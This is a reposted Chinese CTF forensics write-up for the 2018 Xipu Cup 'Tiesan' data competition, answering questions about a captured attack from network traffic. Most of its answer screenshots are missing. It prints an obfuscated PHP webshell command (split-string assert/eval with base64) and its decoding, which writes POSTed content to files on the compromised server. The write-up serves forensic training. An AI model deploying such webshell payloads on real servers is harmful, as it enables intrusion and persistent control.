西普杯铁三2018——数据赛

重做了一下,以前杂项只专注做过密码与隐写,在铁三上就等着GG

0x01 网站后台密码是多少? 打开第二个数据包

输入图片说明

passwd:aabbcc

0x02 攻击者IP是多少? 由上图得出为202.1.1.2

0x03 网站后台登陆地址是多少(http://+IP+路径)?

输入图片说明

0x04 后台写入的Webshell内容是什么?

输入图片说明

输入图片说明

0x05 网站数据库密码是多少?

输入图片说明

0x06 黑客第一个上传的php文件名是什么?

输入图片说明

array_map("ass"."ert",array("ev"."Al("\$xx=\"Ba"."SE6"."4_dEc"."OdE\";@ev"."al(\$xx('QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpO0BzZXRfdGltZV9saW1pdCgwKTtpZihQSFBfVkVSU0lPTjwnNS4zLjAnKXtAc2V0X21hZ2ljX3F1b3Rlc19ydW50aW1lKDApO307ZWNobygiWEBZIik7JGY9Jy92YXIvd3d3L2h0bWwvZGl5cGFnZS9zY2FuLnBocCc7JGM9JF9QT1NUWyJ6MSJdOyRjPXN0cl9yZXBsYWNlKCJcciIsIiIsJGMpOyRjPXN0cl9yZXBsYWNlKCJcbiIsIiIsJGMpOyRidWY9IiI7Zm9yKCRpPTA7JGk8c3RybGVuKCRjKTskaSs9MikkYnVmLj11cmxkZWNvZGUoJyUnLnN1YnN0cigkYywkaSwyKSk7ZWNobyhAZndyaXRlKGZvcGVuKCRmLCd3JyksJGJ1Zik/JzEnOicwJyk7O2VjaG8oIlhAWSIpO2RpZSgpOw=='));");"));

base64解码

@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$f='/var/www/html/diypage/scan.php';$c=$_POST["z1"];$c=str_replace("\r","",$c);$c=str_replace("\n","",$c);$buf="";for($i=0;$i<strlen($c);$i+=2)$buf.=urldecode('%'.substr($c,$i,2));echo(@fwrite(fopen($f,'w'),$buf)?'1':'0');;echo("X@Y");die();

0x07 黑客对内网扫描的范围是多少(ip1-ip2)?

输入图片说明

0x08 .黑客下载的数据库备份文件名是什么?

输入图片说明

导出http对象,得到:

输入图片说明

0x09 黑客上传的图片木马的密码是多少?

输入图片说明

0x0A 黑客修改了哪个文件来配合木马文件(绝对路径)?

输入图片说明

base64转码:@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$f='/var/www/html/diypage/favicon.ico';$c=$_POST["z1"];$c=str_replace("\r","",$c);$c=str_replace("\n","",$c);$buf="";for($i=0;$i<strlen($c);$i+=2)$buf.=urldecode('%'.substr($c,$i,2));echo(@fwrite(fopen($f,'w'),$buf)?'1':'0');;echo("X@Y");die();

0x0B FTP服务器开在了哪个端口?

输入图片说明

转载于:https://my.oschina.net/u/3763247/blog/1818301

  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值